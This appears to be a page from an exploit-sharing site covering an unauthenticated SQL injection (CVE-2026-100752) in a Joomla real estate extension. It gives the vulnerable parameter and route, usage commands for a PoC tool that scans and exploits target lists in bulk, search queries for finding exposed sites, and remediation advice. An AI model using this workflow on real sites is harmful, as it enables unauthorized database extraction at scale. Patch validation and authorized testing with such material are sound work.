POCBIT

Telegram — New PoC releases & critical CVE alerts

You can join our Telegram channel to get instant updates on new PoC releases and critical CVE alerts.

Join @pocbit
Joomlahigh

CVE-2026-100752 — OrdaSoft Joomla Real Estate Manager (Free) Unauthenticated SQL Injection

September 29, 2026 · 71 views

OrdaSoft Real Estate Manager (Free) for Joomla ≤ 6.7.8: unauthenticated SQL injection (CWE-89) via order_field concatenated into ORDER BY in site/realestatemanager.php (com_realestatemanager). Public category, search, and listing views — no auth. Fixed in 6.7.9+. Python PoC: fingerprint, check, error-based exploit, mass -j; legacy order_direction POST fallback.

#joomla#ordasoft#sqli#sql-injection#cms#unauthenticated#realestate#com_realestatemanager#cwe-89

CVE:

CVE-2026-100752

Date:

2026-09-29

Severity:

HIGH

Exploit source

PoC code is available to registered members only.

Description

Overview

CVE-2026-100752 affects OrdaSoft Real Estate Manager (Free) for Joomla — extension ≤ 6.7.8. Fixed in 6.7.9+.

| | | |---|---| | Component | com_realestatemanager | | File | site/realestatemanager.php | | Parameter | order_field → ORDER BY (unquoted, no allow-list) | | Auth | None (public listing / search / category views) | | CWE | CWE-89 SQL Injection | | Also | Legacy order_direction POST injection (Metasploit / pre-6.7.9 audits) |

Mechanism: order_field controls the ORDER BY column/expression. Values such as error-based subqueries are injected because the value is concatenated into SQL without binding or validation.

Example route:

GET /index.php?option=com_realestatemanager&task=showCategory&catid=50&order_field=price&order_direction=asc

Affected query contexts (per CVE text):

  1. Category browsing (showCategory and related)
  2. Search results
  3. Full property listing

PoC page: https://pocbit.org/pocs/cve-2026-100752

GitHub: murrez/CVE-2026-100752

Bundled tool (Python 3)

Download poc.py from this page (View exploit code).

pip install -r requirements.txt

python poc.py -u https://target.example --mode check
python poc.py -u https://target.example --mode check --aggressive

python poc.py -u https://target.example --mode exploit
python poc.py -u https://target.example --mode exploit --subquery "SELECT VERSION()"
python poc.py -u https://target.example --mode exploit --vector order_field_get

python poc.py --list targets.example.txt --mode check -j 30 --output scan.jsonl --vuln-list hits.txt
python poc.py --list hits.txt --mode exploit -j 15 --subquery "SELECT VERSION()" --exploited-list exploited.txt

| Mode | Behavior | |------|----------| | check | Fingerprint com_realestatemanager, scrape catid / Itemid, probe tasks; --aggressive tries SELECT VERSION() when proof is inconclusive | | exploit | Error-based extraction via order_field GET/POST; --subquery, --vector | | Mass | --list + -j → JSONL, hits.txt, exploited.txt |

Tasks probed include showCategory, showSearch, showSearchResult, showRent, showBuy.

Version detection

Manifest (when exposed):

/administrator/components/com_realestatemanager/realestatemanager.xml

If version ≤ 6.7.8 → likely vulnerable. If ≥ 6.7.9 → patched (exploit should fail).

Related (same release train)

| CVE | Type | Fixed | |-----|------|-------| | CVE-2026-100752 | Unauth SQLi (order_field) | 6.7.9 | | CVE-2026-100753 | Reflected XSS (public property views) | 6.7.9 |

Same vendor batch (Sep 2026): Vehicle Manager and other OrdaSoft extensions received separate CVEs — patch all OrdaSoft components you run.

Hunting (examples)

body="option=com_realestatemanager"
body="com_realestatemanager" && (body="ordasoft" || header="Joomla")
title="Real Estate" && body="com_realestatemanager"
body="/components/com_realestatemanager/"

Export hostnames into targets.txt (one URL per line), then check → hits → exploit only on authorized estates.

Remediation

  1. Upgrade to Real Estate Manager 6.7.9+ (OrdaSoft security release).
  2. Inventory all OrdaSoft Joomla extensions on the same site.
  3. WAF / rate limits on com_realestatemanager parameters until patched.

Legal and ethical use

Authorized security testing and patch validation only. Do not use against systems without permission.

References

Related PoCs

Same platform, vendor, or tags — explore more write-ups on Pocbit.

Browse full PoC archive →